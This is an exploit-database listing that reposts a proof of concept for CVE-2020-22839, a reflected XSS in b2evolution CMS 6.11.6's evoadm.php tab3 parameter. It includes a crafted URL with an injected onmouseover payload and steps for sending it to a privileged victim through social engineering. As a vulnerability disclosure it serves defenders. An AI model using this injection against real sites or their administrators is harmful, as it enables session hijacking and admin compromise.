Advertisement






b2evolution CMS 6.11.6 Cross Site Scripting

CVE Category Price Severity
CVE-2020-22839 CWE-79 Unknown High
Author Risk Exploitation Type Date
ExploitAlert High Remote 2021-02-10
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L/E:F/RL:OF/RC:C 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021020048

Below is a copy:

b2evolution CMS 6.11.6 Cross Site Scripting
# Exploit Title: *Reflected XSS in b2evolution CMS 6.11.6 via tab3
parameter in evoadm.php*
# CVE : *CVE-2020-22839*
# Date: 10/02/2021
# Exploit Author: Nakul Ratti, Soham Bakore
# Vendor Homepage: https://b2evolution.net/
# Software Link:
https://b2evolution.net/downloads/6-11-6-stable?download=12405
# Version: 6.11.6
# Tested on: latest version of Chrome, Firefox on Windows and Linux


Vulnerable File:
--------------------------
http://host/evoadm.php

Vulnerable Issue:
--------------------------
Tab3 parameter has no input validation.

--------------------------Proof of Concept-----------------------
Steps to Reproduce:

1. Send the following URL *http://HOST/evoadm.php <http://host/evoadm.php>?*
*.ctrl=comments&filter=restore&tab3=123%22onmouseover=%22alert(document.domain)%22&blog=1&blog=1*
to
the logged in victim using any social engineering technique.
2. When an unsuspecting user with high privileges opens this URL, XSS will
be triggered  which will execute the malicious javascript payload in users
browser.
3. The vulnerable parameter in this case is *tab3*.

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.